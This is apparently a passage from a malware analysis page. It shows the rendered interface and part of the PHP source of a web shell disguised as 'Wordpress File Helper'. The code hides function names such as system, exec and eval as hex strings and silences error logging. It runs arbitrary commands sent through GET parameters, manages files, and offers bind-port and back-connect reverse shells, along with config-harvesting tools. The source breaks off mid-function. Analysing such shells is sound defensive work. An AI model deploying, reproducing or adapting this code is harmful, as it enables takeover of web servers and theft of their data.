										<div class="input-group">
											<input type="file" class="form-control" name="uploadfile[]" id="inputGroupFile04" aria-describedby="inputGroupFileAddon04" aria-label="Upload">
											<button class="btn btn-outline-dark" type="submit" id="inputGroupFileAddon04">Upload</button>
										</div>
									</form>
								 </div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="newfile" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6">
									<form action="" method="post">
										<div class="mb-3">
											<label class="form-label">File Name</label>
											<input type="text" class="form-control" name="filename" placeholder="infinity.txt">
										</div>
										<div class="mb-3">
											<label class="form-label">File Content</label>
											<textarea class="form-control" rows="5" name="filecontent"></textarea>
										</div>
										<button type="submit" class="btn btn-outline-dark">Create</button>
									</form>
								</div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="newfolder" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6">
									<form action="" method="post">
										<div class="mb-3">
											<label class="form-label">Folder Name</label>
											<input type="text" class="form-control" name="foldername" placeholder="infinity">
										</div>
										<button type="submit" class="btn btn-outline-dark">Create</button>
									</form>
								</div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="network" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6 mb-3">
									<div class="mb-3">
										<p>Bind Port</p>
										<label class="form-label">Port</label>
										<input type="number" class="form-control" value="1337" id="bind-port">
									</div>
									<button class="btn btn-outline-dark" type="button" onclick="bindPort(this)">Bind</button>
								</div>
								<div class="col-md-6 mb-3">
									<div class="mb-3">
										<p>Back Connect</p>
										<label class="form-label">Host</label>
										<input type="text" class="form-control" id="bc-host">
									</div>
									<div class="mb-3">
										<label class="form-label">Port</label>
										<input type="number" class="form-control" value="1337" id="bc-port">
									</div>
									<div class="mb-3">
										<label class="form-label">With</label>
										<select name="with" id="bc-with" class="form-control">
											<option value="php">PHP</option>
											<option value="perl">Perl</option>
											<option value="python">Python</option>
											<option value="ruby">Ruby</option>
										</select>
									</div>
									<button class="btn btn-outline-dark" type="button" onclick="backConnect(this)">Back Connect</button>
								</div>
								<div class="col-md-12" id="network-res"></div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="jumping" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6">
									<div class="d-flex justify-content-center flex-wrap my-3">
										<button class="m-1 btn btn-outline-dark btn-sm" onclick="jumping(this)"><i class="fa fa-link"></i> Do Jumping</button>
									</div>
								</div>
								<div class="col-md-6" id="jumping-res"></div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="get-config" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6">
									<div class="d-flex justify-content-center flex-wrap my-3">
										<button class="m-1 btn btn-outline-dark btn-sm" onclick="getConfig(this)"><i class="fa fa-wrench"></i> Get All Config</button>
									</div>
								</div>
								<div class="col-md-6" id="config-res"></div>
							</div>
						</div>
					</div>
				</div>
				<div class="col-md-12">
					<div class="collapse" id="terminal" data-bs-parent="#tool">
						<div class="card card-body border-dark mb-3">
							<div class="row">
								<div class="col-md-6 mb-3">
									<label class="form-label">Command</label>
									<input type="text" class="form-control" onchange="terminal(this)">
								</div>
								<div class="col-md-6">
									<div id="terminal-res"></div>
								</div>
							</div>
						</div>
					</div>
				</div>
			</div>
		</div>

		<div class="row">
			<div class="col-md-12">
				<div class="card border-dark">
					<div class="card-body">
						<h5><i class="fa fa-server"></i> Server Information </h5>
						<div class="table-responsive">
							<table class="table table-hover text-nowrap">
								<tbody><tr>
									<td>Operating System</td>
									<td> : Linux osboxes 5.15.0-60-generic #66-Ubuntu SMP Fri Jan 20 14:29:49 UTC 2023 x86_64</td>
								</tr>
								<tr>
									<td>User / Group</td>
									<td> : 33[www-data] / 33[www-data]</td>
								</tr>
								<tr>
									<td>PHP Version</td>
									<td> : 7.2.34-37+ubuntu22.04.1+deb.sury.org+1</td>
								</tr>
								<tr>
									<td>IP Server</td>
									<td> : ::1</td>
								</tr>
								<tr>
									<td>Storage</td>
									<td class="d-flex">: Total = 216.08 GB, Free = 187.59 GB [86%]</td>
								</tr>
								<tr>
									<td>Domains</td>
									<td>: <font class="text-danger">Can't Read /etc/named.conf</font></td>
								</tr>
								<tr>
									<td>Software</td>
									<td>: Apache/2.4.52 (Ubuntu)</td>
								</tr>
								<tr>
									<td>Disable Functions</td>
									<td>: <font class="text-danger">pcntl_alarm,pcntl_fork,pcntl_waitpid,pcntl_wait,pcntl_wifexited,pcntl_wifstopped,pcntl_wifsignaled,pcntl_wifcontinued,pcntl_wexitstatus,pcntl_wtermsig,pcntl_wstopsig,pcntl_signal,pcntl_signal_get_handler,pcntl_signal_dispatch,pcntl_get_last_error,pcntl_strerror,pcntl_sigprocmask,pcntl_sigwaitinfo,pcntl_sigtimedwait,pcntl_exec,pcntl_getpriority,pcntl_setpriority,pcntl_async_signals,</font></td>
								</tr>
								<tr>
									<td>Useful Functions</td>
									<td>: gcc, cc, ld, make, php, perl, tar, gzip, nc, git, ssh</td>
								</tr>
								<tr>
									<td>Downloader</td>
									<td>: wget, curl, lwp-mirror</td>
								</tr>
								<tr>
									<td colspan="2">CURL : <font class="text-success">ON</font> | SSH2 : <font class="text-danger">OFF</font> | Magic Quotes : <font class="text-success">ON</font> | MySQL : <font class="text-danger">OFF</font> | MSSQL : <font class="text-danger">OFF</font> | PostgreSQL : <font class="text-danger">OFF</font> | Oracle : <font class="text-danger">OFF</font></td>
								</tr>
								<tr>
									<td colspan="2">Safe Mode : <font class="text-danger">OFF</font> | Open Basedir : <font class="text-warning">NONE</font> | Safe Mode Exec Dir : <font class="text-warning">NONE</font> | Safe Mode Include Dir : <font class="text-warning">NONE</font></td>
								</tr>
							</tbody></table>
						</div>
					</div>
				</div>
			</div>
			<div class="col-md-12 my-3">
				<div class="card border-dark">
					<div class="card-body">
						<h5><i class="fa fa-wave-square"></i> Path </h5>
						<nav aria-label="breadcrumb" style="--bs-breadcrumb-divider: '>';">
							<ol class="breadcrumb">
								<li class="breadcrumb-item"><a class="text-decoration-none text-dark" href="?dir=/">/</a></li><li class="breadcrumb-item"><a class="text-decoration-none text-dark" href="?dir=/var">var</a></li><li class="breadcrumb-item"><a class="text-decoration-none text-dark" href="?dir=/var/www">www</a></li><li class="breadcrumb-item active" aria-current="page">html</li>							</ol>
						</nav>
						[ <font class="text-success" data-bs-toggle="modal" data-bs-target="#chmodModal" data-bs-perm="0777" data-bs-name="/var/www/html">0777 </font> &gt;&gt; <font class="text-success" data-bs-toggle="modal" data-bs-target="#chmodModal" data-bs-perm="0777" data-bs-name="/var/www/html"> drwxrwxrwx</font> ]
					</div>
				</div>
			</div>
			<div class="col-md-12" id="main">
				<div class="card border-dark overflow-auto">
					<div class="card-body">
						<h5><i class="fa fa-archive"></i> Files Manager</h5>
																					<div class="table-responsive">
									<table class="table table-hover text-nowrap">
										<thead>
											<tr>
												<th>Name</th>
												<th>Type</th>
												<th>Size</th>
												<th>Last Modified</th>
												<th>Owner/Group</th>
												<th>Permission</th>
												<th>Action</th>
											</tr>
										</thead>
										<tbody>
																							<tr>
													<td>
																												<a href="?dir=/var/www/html" class="text-decoration-none text-dark"><i class="fa fa-folder-open"></i> .</a>
																											</td>
													<td>dir</td>
													<td class="align-middle">--</td>
													<td>2023-02-13 08:10:56</td>
													<td>root/root</td>
													<td><font class="text-success" data-bs-toggle="modal" data-bs-target="#chmodModal" data-bs-perm="0777" data-bs-name="/var/www/html/.">0777 </font> &gt;&gt; <font class="text-success" data-bs-toggle="modal" data-bs-target="#chmodModal" data-bs-perm="0777" data-bs-name="/var/www/html/."> drwxrwxrwx</font></td>
													<td>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1"><i class="fa fa-edit"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1"><i class="fa fa-trash-alt"></i></button>
													</td>
												</tr>
																							<tr>
													<td>
																												<a href="?dir=/var/www" class="text-decoration-none text-dark"><i class="fa fa-folder-open"></i> ..</a>
																											</td>
													<td>dir</td>
													<td class="align-middle">--</td>
													<td>2023-02-13 08:10:55</td>
													<td>root/root</td>
													<td><font class="text-success" data-bs-toggle="modal" data-bs-target="#chmodModal" data-bs-perm="0777" data-bs-name="/var/www/html/..">0777 </font> &gt;&gt; <font class="text-success" data-bs-toggle="modal" data-bs-target="#chmodModal" data-bs-perm="0777" data-bs-name="/var/www/html/.."> drwxrwxrwx</font></td>
													<td>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1"><i class="fa fa-edit"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1"><i class="fa fa-trash-alt"></i></button>
													</td>
												</tr>
																																		<tr>
													<td><a onclick="getSource('/var/www/html/1CTT.php', this)" data-bs-name="1CTT.php"><i class="fa fa-file-code"></i> 1CTT.php</a></td>
													<td>text/x-php</td>
													<td>64.7 KB</td>
													<td>2023-02-13 08:10:56</td>
													<td>osboxes/osboxes</td>
													<td><font class="text-secondary" data-bs-toggle="modal" data-bs-target="#chmodModal" data-bs-perm="0664" data-bs-name="/var/www/html/1CTT.php">0664 </font> &gt;&gt; <font class="text-secondary" data-bs-toggle="modal" data-bs-target="#chmodModal" data-bs-perm="0664" data-bs-name="/var/www/html/1CTT.php"> -rw-rw-r--</font></td>
													<td>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#renameModal" data-bs-name="1CTT.php"><i class="fa fa-edit"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-name="1CTT.php" onclick="getSource('/var/www/html/1CTT.php', this)"><i class="fa fa-file-signature"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#downloadModal" data-bs-file="/var/www/html/1CTT.php"><i class="fa fa-download"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#deleteModal" data-bs-file="/var/www/html/1CTT.php"><i class="fa fa-trash-alt"></i></button>
													</td>
												</tr>
																							<tr>
													<td><a onclick="getSource('/var/www/html/beneri.se_malware_analysis', this)" data-bs-name="beneri.se_malware_analysis"><i class="fa fa-file"></i> beneri.se_malware_...</a></td>
													<td>inode/x-empty</td>
													<td>0 B</td>
													<td>2023-02-13 08:10:56</td>
													<td>root/root</td>
													<td><font class="text-secondary" data-bs-toggle="modal" data-bs-target="#chmodModal" data-bs-perm="0644" data-bs-name="/var/www/html/beneri.se_malware_analysis">0644 </font> &gt;&gt; <font class="text-secondary" data-bs-toggle="modal" data-bs-target="#chmodModal" data-bs-perm="0644" data-bs-name="/var/www/html/beneri.se_malware_analysis"> -rw-r--r--</font></td>
													<td>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#renameModal" data-bs-name="beneri.se_malware_analysis"><i class="fa fa-edit"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-name="beneri.se_malware_analysis" onclick="getSource('/var/www/html/beneri.se_malware_analysis', this)"><i class="fa fa-file-signature"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#downloadModal" data-bs-file="/var/www/html/beneri.se_malware_analysis"><i class="fa fa-download"></i></button>
														<button type="button" class="btn btn-outline-dark btn-sm mr-1" data-bs-toggle="modal" data-bs-target="#deleteModal" data-bs-file="/var/www/html/beneri.se_malware_analysis"><i class="fa fa-trash-alt"></i></button>
													</td>
												</tr>
																					</tbody>
									</table>
								</div>
																		</div>
				</div>
			</div>
			<div class="col-md-12 my-3">
				<div class="card border-dark">
					<div class="card-body">
						Copyright © Infinity Cyber Team <span class="float-end">Coded by <span class="text-muted">Bibib</span></span>
					</div>
				</div>
			</div>
		</div>
	</div>
	
	<div class="modal fade" id="renameModal" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="renameModalLabel" aria-hidden="true">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="renameModalLabel">Rename</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <form method="post" id="rename-form">
		      <div class="modal-body">
		          <div class="mb-3">
		            <label for="newname" class="col-form-label">New Name:</label>
		            <input type="text" class="form-control" name="newname" id="newname">
		          </div>
		      </div>
		      <div class="modal-footer">
		        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
		        <button type="submit" class="btn btn-primary">Rename</button>
		      </div>
        </form>
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="chmodModal" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1" aria-labelledby="chmodModalLabel" aria-hidden="true">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="renameModalLabel">Change Permission</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <form method="post" id="chmod-form">
		      <div class="modal-body">
		          <div class="mb-3">
		            <label for="newperm" class="col-form-label">New Permission:</label>
		            <input type="text" class="form-control" name="perm" id="newperm">
		          </div>
		      </div>
		      <div class="modal-footer">
		        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
		        <button type="submit" class="btn btn-primary">Save</button>
		      </div>
        </form>
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="deleteModal" aria-hidden="true" aria-labelledby="deleteModalToggleLabel2" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="exampleModalToggleLabel2">Delete</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <div class="modal-body">
	        Are you sure want to delete this?
	      </div>
	      <div class="modal-footer">
	        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
	        <a href="" class="btn btn-danger" id="delete-confirm">Delete</a>
	      </div>
	      
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="downloadModal" aria-hidden="true" aria-labelledby="deleteModalToggleLabel2" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="exampleModalToggleLabel2">Download</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <div class="modal-body">
	        Are you sure want to download this?
	      </div>
	      <div class="modal-footer">
	        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
	        <a href="" class="btn btn-danger" id="download-confirm" download="">Download</a>
	      </div>
	      
	    </div>
	  </div>
	</div>
	
	<div class="modal fade" id="viewModal" aria-hidden="true" aria-labelledby="deleteModalToggleLabel2" data-bs-backdrop="static" data-bs-keyboard="false" tabindex="-1">
	  <div class="modal-dialog modal-dialog-centered">
	    <div class="modal-content">
	      <div class="modal-header">
	        <h5 class="modal-title" id="exampleModalToggleLabel2">View</h5>
	        <button type="button" class="btn-close" data-bs-dismiss="modal" aria-label="Close"></button>
	      </div>
	      <form action="" method="post">
		      <div class="modal-body">
		        <div class="mb-3">
	            <label for="content" class="col-form-label">Content:</label>
	            <textarea class="form-control" id="content" rows="15" name="content"></textarea>
	          </div>
		      </div>
		      <div class="modal-footer">
		        <button type="button" class="btn btn-secondary" data-bs-dismiss="modal">Close</button>
		        <button type="submit" class="btn btn-primary">Save</button>
		      </div>
	      </form>
	    </div>
	  </div>
	</div>
	
	<script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.1/dist/js/bootstrap.bundle.min.js" integrity="sha384-gtEjrD/SeCtmISkJkNUaaKMoLD0//ElJ19smozuHV6z3Iehds+3Ulb9Bn9Plx0x4" crossorigin="anonymous"></script>
	<script>
		var renameModal = document.getElementById('renameModal')
		var chmodModal = document.getElementById('chmodModal')
		var deleteModal = document.getElementById('deleteModal')
		var downloadModal = document.getElementById('downloadModal')
		
		renameModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var name = button.getAttribute('data-bs-name')
			var modalTitle = renameModal.querySelector('.modal-title')
			var modalBodyInput = renameModal.querySelector('.modal-body input')
			var hiddenInput = document.createElement('input')
			hiddenInput.type = "hidden";
			hiddenInput.value = name;
			hiddenInput.name = "oldname";
			document.getElementById("rename-form").appendChild(hiddenInput);
			
			modalBodyInput.value = name
		})
		
		chmodModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var perm = button.getAttribute('data-bs-perm')
			var name = button.getAttribute('data-bs-name')
			var modalTitle = chmodModal.querySelector('.modal-title')
			var modalBodyInput = chmodModal.querySelector('.modal-body input')
			var hiddenInput = document.createElement('input')
			hiddenInput.type = "hidden";
			hiddenInput.value = name;
			hiddenInput.name = "filename";
			document.getElementById("chmod-form").appendChild(hiddenInput);
			
			modalBodyInput.value = perm
		})
		
		deleteModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var file = button.getAttribute('data-bs-file')
			var deleteConfirm = document.getElementById('delete-confirm')
			deleteConfirm.href = '?dir=' + file + '&do=delete'
		})
		
		downloadModal.addEventListener('show.bs.modal', function (event) {
			var button = event.relatedTarget
			var file = button.getAttribute('data-bs-file')
			var downloadConfirm = document.getElementById('download-confirm')
			downloadConfirm.href = file
		})
		
		function getSource(filename, d) {
			fetch(window.location.pathname + '?do=get-source&filename=' + filename)
			.then(res => res.text())
			.then(function(data) {
				var viewModal = document.getElementById('viewModal')
				var myModal = new bootstrap.Modal(viewModal)
				var name = d.getAttribute('data-bs-name')
				var modalTitle = viewModal.querySelector('.modal-title')
				var modalContent = viewModal.querySelector('.modal-body textarea')
				var hiddenInput = document.createElement('input')
				hiddenInput.type = "hidden";
				hiddenInput.value = name;
				hiddenInput.name = "filename";
				viewModal.querySelector("form").appendChild(hiddenInput);
	
				modalTitle.textContent = 'Edit ' + name
				modalContent.value = data
				myModal.show(viewModal)
			})
		}
		
		function terminal(e) {
			var cmd = e.value;
			fetch(window.location.pathname + '?do=terminal&command=' + cmd)
			.then(res => res.text())
			.then(function(data) {
				var termRes = document.getElementById('terminal-res');
				termRes.innerHTML = data
				e.value = ''
			})
		}
		
		function jumping(e) {
			fetch(window.location.pathname + '?do=jumping')
			.then(res => res.text())
			.then(function(data) {
				var jumpRes = document.getElementById('jumping-res');
				jumpRes.innerHTML = data
			})
		}
		
		function getConfig(e) {
			fetch(window.location.pathname + '?do=get-config')
			.then(res => res.text())
			.then(function(data) {
				var confRes = document.getElementById('config-res');
				confRes.innerHTML = data
			})
		}
		
		function bindPort(e) {
			var port = document.getElementById('bind-port').value
			fetch(window.location.pathname + '?do=bind-port&port=' + port)
			.then(res => res.text())
			.then(function(data) {
				var netRes = document.getElementById('network-res');
				netRes.innerHTML = data
			})
		}
		
		function backConnect(e) {
			var host = document.getElementById('bc-host').value
			var port = document.getElementById('bc-port').value
			var within = document.getElementById('bc-with').value
			fetch(window.location.pathname + '?do=back-connect&host='+host+'&port='+port+'&with='+within)
			.then(res => res.text())
			.then(function(data) {
				var netRes = document.getElementById('network-res');
				netRes.innerHTML = data
			})
		}
		
	</script>

</body></html>

Original PHP code

<?php

$shellName = 'Wordpress File Helper';
$logo = 'https://image.flaticon.com/icons/png/512/2959/2959607.png';
$func = ["7068705f756e616d65", "70687076657273696f6e", "676574637764", "6368646972", "707265675f73706c6974", "61727261795f64696666", "69735f646972", "69735f66696c65", "69735f7772697461626c65", "69735f7265616461626c65", "66696c6573697a65", "636f7079", "66696c655f657869737473", "66696c655f7075745f636f6e74656e7473", "66696c655f6765745f636f6e74656e7473", "6d6b646972", "72656e616d65", "737472746f74696d65", "68746d6c7370656369616c6368617273", "64617465", "66696c656d74696d65", "7363616e646972", "73797374656d", "65786563", "7061737374687275", "7368656c6c5f65786563", "6f625f6765745f636f6e74656e7473", "6f625f656e645f636c65616e", "6469726e616d65", "6469736b5f746f74616c5f7370616365", "6469736b5f667265655f7370616365", "696e695f676574", "707265675f6d617463685f616c6c", "706f7369785f6765747077756964", "706f7369785f6765746772676964", "70617468696e666f", "66696c656f776e6572", "66696c6567726f7570", "66696c6574797065", "676574686f73746e616d65", "676574686f737462796e616d65", "737562737472", "737472737472", "696e695f736574", "66696c65", "7374725f7265706c616365", "6578706c6f6465", "6576616c", "6f625f7374617274", "66756e6374696f6e5f657869737473", "6572726f725f7265706f7274696e67", "7365745f74696d655f6c696d6974", "636c656172737461746361636865", "646174655f64656661756c745f74696d657a6f6e655f736574", "666c757368", "7374726c656e", "7472696d", "656d707479", "6973736574", "66696c657065726d73", "7374726c656e", "636f756e74", "726f756e64", "6d696d655f636f6e74656e745f74797065", "6765745f63757272656e745f75736572", "6765746d79756964", "6765746d79676964", "706f7369785f67657465756964", "706f7369785f67657465676964", "616464736c6173686573", "73796d6c696e6b", "726d646972", "756e6c696e6b", "61727261795f6d6170", "676c6f62", "686561646572", "706f70656e", "69735f7265736f75726365", "66656f66", "6672656164", "70636c6f7365", "70726f635f6f70656e", "73747265616d5f6765745f636f6e74656e7473", "636c6173735f657869737473", "737072696e7466", "63686d6f64", "666f70656e", "667772697465", "6261736536345f6465636f6465", "66736f636b6f70656e", "6670757473", "6667657473", "66636c6f7365"];
for ($i = 0; $i < count($func); $i++) {
	$func[$i] = dehex($func[$i]);
}

session_start();
$func[50](0);
@$func[51](0);
@$func[52]();
@$func[43]('error_log', null);
@$func[43]('log_errors',0);
@$func[43]('max_execution_time',0);
@$func[43]('output_buffering',0);
@$func[43]('display_errors', 0);
$func[53]("Asia/Jakarta");

if (isset($_GET['dir'])) {
	$dir = $_GET['dir'];
	$func[3]($dir);
} else {
	$dir = $func[2]();
}
	
if ($func[12]("/etc/named.conf")) {
	$d0mains = read("/etc/named.conf");
	if (!$d0mains) {
		$dom = "<font class='text-danger'>Can't Read /etc/named.conf</font>";
	} else { 
		$count = 0;
		foreach ($d0mains as $d0main) {
			if (@$func[42]($d0main, "zone")) {
				$func[32]('#zone "(.*)"#', $d0main, $domains);
				$func[54]();
				if ($func[55]($func[56]($domains[1][0])) > 2){
					$func[54]();
					$count++;
				}
			}
		}
		if ($count > 0) {
			$dom = "<font class='text-success'>$count Domain</font>";
		} else {
			$dom = "<font class='text-warning'>Can't get Domain</font>";
		}
	}
} else {
	$dom = "<font class='text-danger'>Can't Read /etc/named.conf</font>";
}

$dir = $func[45]("\\", "/", $dir);
$scdir = $func[46]("/", $dir);
$total = $func[29]($dir);
$free = $func[30]($dir);
$pers =  (int) ($free / $total * 100);
$ds = @$func[31]("disable_functions");
$show_ds = (!empty($ds)) ? "<font class='text-danger'>$ds</font>" : "<font class='text-success'>All function is accessible</font>";

$cmd_uname = exe("uname -a");
$uname = $func[49]('php_uname') ? $func[41](@$func[0](), 0, 120) : ($func[55]($cmd_uname) > 0 ? $cmd_uname : '( php_uname ) Function Disabled !');

if (strtolower($func[41](PHP_OS, 0, 3)) == "win") {
	$sys = "win";
} else {
	$sys = "unix";
}

if (isset($_GET['do'])) {
	$do = $_GET['do'];
	if ($do == 'delete') {
		if ($func[12]($dir)) {
			if (deleter($dir)) {
				flash("File/Folder deleted successfully!", "Success", "success", "?dir=" . $func[28]($dir));
			} else {
				flash("File/Folder failed to delete!", "Failed", "danger");
			}
		} else {
			flash("File/Folder is doesn't exist!", "Failed", "warning");
		}
	} else if ($do == 'get-source') {
		if (isset($_GET['filename'])) {
			die($func[14]($_GET['filename']));
		}
	} else if ($do == 'terminal') {
		if (isset($_GET['command'])) {
			die('<pre>'.exe($_GET['command']).'</pre>');
		}
	} else if ($do == 'jumping') {
		die(jumping());
	} else if ($do == 'get-config') {
		die(getConfig());
	} else if ($do == 'bind-port') {
		if (isset($_GET['port'])) {
			die(networkTools(1, $_GET['port']));
		}
	} else if ($do == 'back-connect') {
		if (isset($_GET['host']) && isset($_GET['port'])) {
			die(networkTools(2, $_GET['port'], $_GET['host'], $_GET['with']));
		}
	}
} else {
	$do = 'filesman';
	$title = 'Files Manager';
	$icon = 'archive';
}

((isset($_POST["foldername"])) ? ($func[12]("$dir/{$_POST['foldername']}") ? flash("Folder name is exist!", "Failed", "warning") : ($func[15]("$dir/{$_POST['foldername']}") ? flash("Folder created successfully!", "Success", "success") : flash("Folder failed to create!", "Failed", "danger"))) : null);

((isset($_POST["filename"]) && isset($_POST['filecontent'])) ? ($func[12]("$dir/{$_POST['filename']}") ? flash("File name is exist!", "Failed", "warning") : ($func[13]("$dir/{$_POST['filename']}", $_POST['filecontent']) ? flash("File created successfully!", "Success", "success") : flash("File failed to create!", "Failed", "danger"))) : null);

((isset($_POST["newname"]) && isset($_POST['oldname'])) ? ($func[12]("$dir/{$_POST['newname']}") ? flash("File/Folder name is exist!", "Failed", "warning") : ($func[16]("$dir/{$_POST['oldname']}", $_POST['newname']) ? flash("File/Folder renamed successfully!", "Success", "success") : flash("File/Folder failed to rename!", "Failed", "danger"))) : null);

((isset($_POST["filename"]) && isset($_POST['content'])) ? ($func[13]("$dir/{$_POST['filename']}", $_POST['content']) ? flash("File saved successfully!", "Success", "success") : flash("File failed to save!", "Failed", "danger")) : null);

((isset($_POST["filename"]) && isset($_POST['perm'])) ? ($func[85]("$dir/{$_POST['filename']}", $_POST['perm']) ? flash("File permission changed successfully!", "Success", "success") : flash("File permission failed to change!", "Failed", "danger")) : null);

if (isset($_FILES["uploadfile"])) {
	$n = $_FILES["uploadfile"]["name"];
	for ($i = 0; $i < $func[61]($n); $i++) {
		if ($func[11]($_FILES["uploadfile"]["tmp_name"][$i], $n[$i])) {
			flash("File uploaded successfully!", "Success", "success");
		} else {
			flash("File failed to upload!", "Failed", "danger");
		}
	}
}

if (@$func[31]('open_basedir')) {
	$basedir_data = @$func[31]('open_basedir');
	if ($func[55]($basedir_data) > 120){
		$open_b = "<font class='text-success'>" . $func[41]($basedir_data, 0, 120) . "...</font>";
	} else {
		$open_b = '<font class="text-success">' . $basedir_data . '</font>';
	}
} else {
	$open_b = '<font class="text-warning">NONE</font>';
}

if (!$func[49]('posix_getegid')) {
	$user = $func[49]("get_current_user") ? @$func[64]() : "????";
	$uid = $func[49]("getmyuid") ? @$func[65]() : "????";
	$gid = $func[49]("getmygid") ? @$func[66]() : "????";
	$group = "?";
} else {
	$uid = $func[49]("posix_getpwuid") && $func[49]("posix_geteuid") ? @$func[33]($func[67]()) : ["name" => "????", "uid" => "????"];
	$gid = $func[49]("posix_getgrgid") && $func[49]("posix_getegid") ? @$func[34]($func[68]()) : ["name" => "????", "gid" => "????"];
	$user = $uid['name'];
	$uid = $uid['uid'];
	$group = $gid['name'];
	$gid = $gid['gid'];
}

if ($sys == 'unix') {
	if (!@$func[31]('safe_mode')) {
		if ($func[55](exe("id")) > 0) {
			$userful = ['gcc','lcc','cc','ld','make','php','perl','python','ruby','tar','gzip','bzip','bzialfa2','nc','locate','suidperl','git','docker', 'ssh'];
			$x = 0;
			foreach ($userful as $i) {
				if (which($i)) {
					$x++;
					$useful .= $i . ', ';
				}
			}
			if ($x == 0) {
				$useful = '--------';
			}
			$downloaders = ['wget','fetch','lynx','links','curl','get','lwp-mirror'];
			$x = 0;
			foreach($downloaders as $i) {
				if (which($i)) {
					$x++;
					$downloader .= $i . ', ';
				}
			}
			if ($x == 0) {
				$downloader = '--------';
			}
		} else {
			$useful = '--------';
			$downloader = '--------';
		}
	} else {
		$useful = '--------';
		$downloader = '--------';
	}
}

function hex($str) {
	global $func;
	$r = "";
	for ($i = 0; $i < $func[55]($str); $i++) {
		$r .= dechex(ord($str[$i]));
	}
	return $r;
}

function dehex($str) {
	$r = "";
	$len = (strlen($str) - 1);
	for ($i = 0; $i < $len; $i += 2) {
		$r .= chr(hexdec($str[$i].$str[$i + 1]));
	}
	return $r;
}

function formatSize($bytes) {
	global $func;
	$types = array( 'B', 'KB', 'MB', 'GB', 'TB' );
	for ( $i = 0; $bytes >= 1024 && $i < ( $func[61]( $types ) - 1 ); $bytes /= 1024, $i++ );
	return( $func[62]( $bytes, 2 )." ".$types[$i] );
}

function perms($file) {
	global $func;
	$perms = $func[59]($file);
	if (($perms & 0xC000) == 0xC000) {
		$info = 's';
	} elseif (($perms & 0xA000) == 0xA000) {
		$info = 'l';
	} elseif (($perms & 0x8000) == 0x8000) {
		$info = '-';
	} elseif (($perms & 0x6000) == 0x6000){
		$info = 'b';
	} elseif (($perms & 0x4000) == 0x4000) {
		$info = 'd';
	} elseif (($perms & 0x2000) == 0x2000) {
		$info = 'c';
	} elseif (($perms & 0x1000) == 0x1000) {
	$info = 'p';
	} else {
		$info = 'u';
	}
	$info .= (($perms & 0x0100) ? 'r' : '-');
	$info .= (($perms & 0x0080) ? 'w' : '-');
	$info .= (($perms & 0x0040) ?
	(($perms & 0x0800) ? 's' : 'x' ) :
	(($perms & 0x0800) ? 'S' : '-'));
	$info .= (($perms & 0x0020) ? 'r' : '-');
	$info .= (($perms & 0x0010) ? 'w' : '-');
	$info .= (($perms & 0x0008) ?
	(($perms & 0x0400) ? 's' : 'x' ) :
	(($perms & 0x0400) ? 'S' : '-'));
	$info .= (($perms & 0x0004) ? 'r' : '-');
	$info .= (($perms & 0x0002) ? 'w' : '-');
	$info .= (($perms & 0x0001) ?
	(($perms & 0x0200) ? 't' : 'x' ) :
	(($perms & 0x0200) ? 'T' : '-'));
